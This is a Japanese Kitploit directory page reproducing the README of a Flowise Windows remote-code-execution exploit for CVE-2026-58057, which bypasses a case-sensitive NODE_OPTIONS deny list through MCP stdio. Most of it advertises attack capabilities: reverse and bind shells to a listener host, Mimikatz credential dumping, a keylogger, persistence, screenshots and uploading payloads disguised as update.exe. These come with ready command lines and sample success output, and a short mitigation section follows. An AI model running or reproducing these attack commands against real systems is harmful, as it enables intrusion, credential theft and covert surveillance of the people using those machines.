Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCEエクスプロイト(CVE-2026-58057)。大文字小文字の区別に関する欠陥を利用して環境変数の検証をバイパスします。node_optionsを使用して、MCP stdio経由で任意のコードを注入します。リバースシェル、永続化、ファイルアップロード、資格情報ダンプをサポートします。許可されたセキュリティテストのみを対象としています。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
永続化メカニズム脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
ペイロード開発
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Flowise Windows RCEエクスプロイト(CVE-2026-58057)。大文字小文字の区別に関する欠陥を利用して環境変数の検証をバイパスします。node_optionsを使用して、MCP stdio経由で任意のコードを注入します。リバースシェル、永続化、ファイルアップロード、資格情報ダンプをサポートします。許可されたセキュリティテストのみを対象としています。

リポジトリを見る
1222ヶ月前未レビュー
共有

Flowise CVE-2026-58057 - Windows Remote Code Execution Exploit

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 概要

これは、Windows プラットフォーム上の Flowise における重要なリモートコード実行脆弱性 CVE-2026-58057 に対するプロダクショングレードのエクスプロイトです。この脆弱性は、大文字小文字を区別する環境変数検証に起因し、小文字の node_options をブロックできないため、攻撃者が NODE_OPTIONS の拒否リストをバイパスし、カスタム MCP stdio 設定を通じて任意のコードを実行することを可能にします。

このエクスプロイトは、モジュール式アーキテクチャ、包括的なエラーハンドリング、複数のペイロードタイプのサポートにより、プロフェッショナルなソフトウェアエンジニアリングの実践を示しています。

f1

f2

⚠️ 免責事項

重要: このツールは、認可されたセキュリティテスト、ペネトレーションテスト、教育目的のみで提供されています。著者は、本ソフトウェアの誤用または損害について一切の責任を負いません。システムをテストする前に、必ず適切な許可を得てください。

🔍 技術的詳細

脆弱性の根本原因

# 脆弱な検証(大文字小文字を区別)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # 正確な大文字の一致のみをブロック
    raise ValueError(f"Modification not allowed")

エクスプロイトの仕組み

  1. 攻撃者が Flowise に認証する
  2. カスタム MCP stdio ノードを作成/変更する
  3. 小文字の node_options 環境変数を注入する
  4. 値を --require malicious-loader.js に設定する
  5. MCP stdio が実行されると、Node.js がローダーを実行する
  6. 任意のコード実行が達成される

✨ 機能

コア機能

  • ✅ リバースシェル - 攻撃者マシンに接続を戻す
  • ✅ バインドシェル - ターゲット上でリスニングポートを開く
  • ✅ コマンド実行 - 任意のシステムコマンドを実行する
  • ✅ ファイルアップロード - ターゲットシステムにファイルをアップロードする
  • ✅ 永続化 - 複数の永続化メカニズム
  • ✅ 情報収集 - システムインテリジェンスを収集する
  • ✅ 資格情報ダンプ - Mimikatz 統合
  • ✅ スクリーンショットキャプチャ - デスクトップのスクリーンショットを取得する
  • ✅ キーロガー - キーロギング機能のインストール

技術的特徴

  • 🔐 複数の認証方法 - API キーまたはユーザー名/パスワード
  • 🔄 自動リトライロジック - ネットワーク問題に対する耐性
  • 🧹 自己クリーン - ターゲットからローダーファイルを削除
  • 🌐 クロスプラットフォーム - Windows/Linux/macOS で動作
  • 🎨 カラー出力 - 読みやすさの向上
  • 📊 詳細デバッグ - トラブルシューティングのための詳細ロギング

📦 インストール

前提条件

  • Python 3.6 以上
  • pip(Python パッケージマネージャー)

クイックインストール

# リポジトリのクローン
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# 依存関係のインストール
pip install -r requirements.txt

# または最小限のインストール
pip install requests urllib3

Docker インストール(オプション)

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 使用方法

コマンドラインオプション

python3 exploit.py --help

認証オプション

オプション説明例
-t, --targetFlowise の URL(必須)http://localhost:3000
-k, --api-keyFlowise API キーflowise_abc123...
-u, --usernameユーザー名admin
-p, --passwordパスワードpassword123

ペイロードオプション

オプション説明例
--payloadペイロードタイプreverse_shell
--lhostリスナーホスト192.168.1.100
--lportリスナーポート4444
--command実行するコマンドwhoami
--local-fileアップロードするファイルpayload.exe
--remote-pathリモート保存先パスC:\\Temp\\update.exe

実行オプション

オプション説明
--interactiveインタラクティブシェルを起動
--verboseデバッグ出力を有効化
--timeoutリクエストのタイムアウト(秒)
--retriesリトライ試行回数

📝 使用例

1. 基本的なリバースシェル

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. インタラクティブなリバースシェル

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. コマンド実行

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. ファイルアップロード

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. 資格情報ダンプ(Mimikatz)

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. 永続化のインストール

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. 情報収集

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. スクリーンショットキャプチャ

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 ペイロードタイプ

ペイロード説明引数
reverse_shellリスナーに接続を戻す--lhost, --lport
bind_shellリスニングポートを開く--lport
command_execコマンドを実行する--command
file_uploadターゲットにファイルをアップロード--local-file, --remote-path
persistence永続化をインストールなし
info_gatherシステム情報を収集なし
mimikatz資格情報をダンプなし
screenshotスクリーンショットを取得なし
keyloggerキーロガーをインストールなし

🛡️ 緩和策

Flowise のアップグレード

# バージョン 3.1.3 以降にアップグレード
npm install -g flowise@latest
# または
docker pull flowiseai/flowise:latest

回避策

  • カスタム MCP 設定へのアクセスを制限する
  • ネットワークのセグメンテーションを実装する
  • 不審な環境変数を監視する
  • Web アプリケーションファイアウォール(WAF)を使用する

修正されたコード

# 修正された検証(大文字小文字を区別しない)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # 大文字小文字を区別しないチェック
    raise ValueError(f"Modification not allowed")

📊 出力例

成功したエクスプロイト

[14:32:15] ℹ エクスプロイトシーケンスを開始...
[14:32:15] ℹ 認証を試行中...
[14:32:16] ✓ API キーで認証されました
[14:32:16] ℹ reverse_shell ペイロードの実行を準備中...
[14:32:16] ℹ 環境変数を注入中...
[14:32:17] ℹ ペイロードの実行をトリガー中...
[14:32:19] ✓ ペイロード 'reverse_shell' が正常に実行されました!
[14:32:19] ℹ リバースシェルリスナーが 192.168.1.50:4444 で準備完了

詳細モード

[14:32:15] 🔍 リトライ戦略でセッションを作成しました
[14:32:15] 🔍 既存のワークスペースを使用: ws_123456
[14:32:16] 🔍 ローダー書き込み: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio 設定を更新しました

🐛 トラブルシューティング

一般的な問題

ツールをダウンロード